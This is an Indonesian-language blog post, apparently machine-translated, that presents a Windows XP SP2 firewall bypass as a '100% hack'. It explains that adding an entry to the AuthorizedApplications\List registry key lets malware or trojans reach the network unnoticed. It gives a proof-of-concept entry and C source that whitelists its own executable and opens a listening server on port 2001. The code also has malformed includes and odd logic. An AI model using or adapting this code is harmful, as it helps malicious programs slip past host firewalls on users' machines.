Halo teman, saya hari ini akan berbagi dengan Anda menggunakan teknik yang kita bisa bypass windows-xp service pack-2 firewall. Sebuah kerjanya 100% hack dan yang pada dasarnya mengeksploitasi di windows XP.
Teknik ini tidak lain adalah kerentanan yang ditemukan di windows-xp sp2 firewall.Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 dibundel dengan Firewall. Akses langsung ke kunci registri Firewall memungkinkan penyerang lokal untuk memotong daftar Firewall blocking dan memungkinkan program jahat dapat terhubung jaringan.
Vulnerable Systems :-
* Microsoft Windows XP SP2
Firewall Windows XP SP2 memiliki daftar program yang diperbolehkan dalam registri yang tidak benar dilindungi dari modifikasi oleh attacker.If lokal berbahaya penyerang menambahkan sebuah kunci baru ke alamat registry
penyerang dapat mengaktifkan malware-nya atau Trojan dapat terhubung ke Internet tanpa Firewall memicu peringatan.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Proof of Concept :-
Peluncuran program regedit.exe dan mengakses kunci ditemukan di bawah jalan sebagai berikut:
Peluncuran program regedit.exe dan mengakses kunci ditemukan di bawah jalan sebagai berikut:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Source Code :-
#include <*stdio.h*>
#include <*windows.h*>
#include <*ezsocket.h*>
#include <*conio.h*>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */
Tidak ada komentar:
Posting Komentar